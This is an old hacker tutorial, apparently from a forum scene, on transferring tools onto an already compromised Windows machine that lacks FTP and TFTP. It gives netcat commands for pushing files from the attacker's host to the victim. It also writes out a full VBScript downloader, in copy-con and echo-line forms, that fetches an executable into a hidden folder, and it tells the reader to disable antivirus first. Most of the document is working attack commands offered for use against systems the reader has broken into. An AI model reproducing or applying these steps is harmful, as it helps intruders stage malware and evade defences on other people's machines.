

*Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.*
*Tutorial Written By: DiabloHorn						 *
*Comment: This is intended mostly for rehacking, sometimes for hacking new ones	 *
*Creditz: Kimatrix,						 *
*COMMENT: This is mostly intended to only download wget.exe with it dont try to  *
*download big things like serv-u						 *


0) Opening Words
1) The Netcat Way
2) .vbs script
3) Greetz

*					0) Opening Words						 *
Hmm what shall I say this time?									 
O yeah I'm trying to improve my english hope you will read tut's of mine with perfect english on it
pretty impossible but I'll try.									 
Well about the tutorial you are about to read, this tutorial is ment for when you are on a machine	 
you've got a shell but when typing the command tftp or ftp to get the files on it , it returns:	 
"ftp" Command not recognized or some similar error.							 
if that error sounds familiar then this tutorial might be for you.					 
I say might because if telnet is also deactivated then well to bad.					 													 
Hope you all still awake so read on and get started.							 

*					1) The Netcat Way						 *

1) Purpose
2) Tools Needed
3) HowTo

1)	Purpose

Using 2 netcat's to retrieve a file

2)	Tools Needed

- a Shell
- 2 Netcat's
- File 2 Transfer

3)	HowTo

Fire up netcat on your machine like this:

nc.exe -l -p 4455 -u -vvv < file.exe

When done fire up netcat on the hacked machine like this:

nc.exe -u host port > outputfile.exe

When this is done therewill be a connection but nothing will be sent until you send a charachter from
own machine to the hacked one so just type something "a" would be enough and hit enter.
Now the stupid part with this you have no idea how long it will take so I suggest you DON'T
transfer serv-u with this, but rather a thing like wget.exe and then just download the stuff from the web.
This is tested locally and remote with normal acces to the shell so just tweak it until it works for you.

*					2) .vbs script						 *

1) Purpose
2) Tools Needed
3) HowTo

1)	Purpose

this is ment to make a .vbs executable script that downloads a file from the web.
similar to wget but doesn't need to be uploaded also works when tftp and ftp and net commands
are disabled.

2)	Tools Needed

- a Shell
- a commandline editor
- if no commandline editor availible the ""echo" command

3)	HowTo

first of all make shure any anti-virus is disabled because a .vbs file sometimes get caught
by antivirus programs.

First I'll discuss the commandline editor option
then I'll discuss the echo option

########Commandline editor option####################

firt of all go to the directory you want the file to be downloaded to in example:

cd c:/Recycler/

when done do this:

copy con get.vbs/

when this is done you can inmediatly start typping text so let's type the following things

Dim DataBin										 /
Dim HTTPGET										 /
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")						 /
HTTPGET.Open "GET", "", False				 /
HTTPGET.Send										 /
DataBin = HTTPGET.ResponseBody								 /
Const adTypeBinary=1									 /
Const adSaveCreateOverWrite=2								 /
Dim SendBinary										 /
Set SendBinary = CreateObject("ADODB.Stream")						 /
SendBinary.Type = adTypeBinary								 /
SendBinary.Open										 /
SendBinary.Write DataBin								 /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite				 /

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False 	   /	
Change that to the place where you're OWN .exe file is located		   /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite		   /
Change that to the name of the .exe file you want to have and it's location/

When done typing the above just save the file by pressing CTRL+Z when the file is saved
just execute it like a normal .exe and wait till the file is downloaded.

########ECHO option####################

echo Dim DataBin >c:/recycler/get.vbs							   /
echo Dim HTTPGET >>c:/recycler/get.vbs							   /
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:/recycler/get.vbs   		   /
echo HTTPGET.Open "GET", "", False >>c:/recycler/get.vbs / 
echo HTTPGET.Send >>c:/recycler/get.vbs							   /
echo DataBin = HTTPGET.ResponseBody >>c:/recycler/get.vbs				   /
echo Const adTypeBinary=1 >>c:/recycler/get.vbs						   /
echo Const adSaveCreateOverWrite=2 >>c:/recycler/get.vbs				   /
echo Dim SendBinary >>c:/recycler/get.vbs						   /
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:/recycler/get.vbs		   /
echo SendBinary.Type = adTypeBinary >>c:/recycler/get.vbs				   /
echo SendBinary.Open >>c:/recycler/get.vbs						   /
echo SendBinary.Write DataBin >>c:/recycler/get.vbs					   /
echo SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite >>c:/recycler/get.vbs	   /

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False 	   /	
Change that to the place where you're OWN .exe file is located		   /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite		   /
Change that to the name of the .exe file you want to have and it's location/

When done just execute like normal .exe  and wait till the file is downloaded.

*					3) Greetz							 *

To the wonderfull world of internet and Kimatrix for helping me on testing the netcat things.

Hack it all just don't break it all.

Also want to say thx to all the peeps on NFE who gave me a nice place to learn in a quick way
new things and help other peeps out with my knowlegde.




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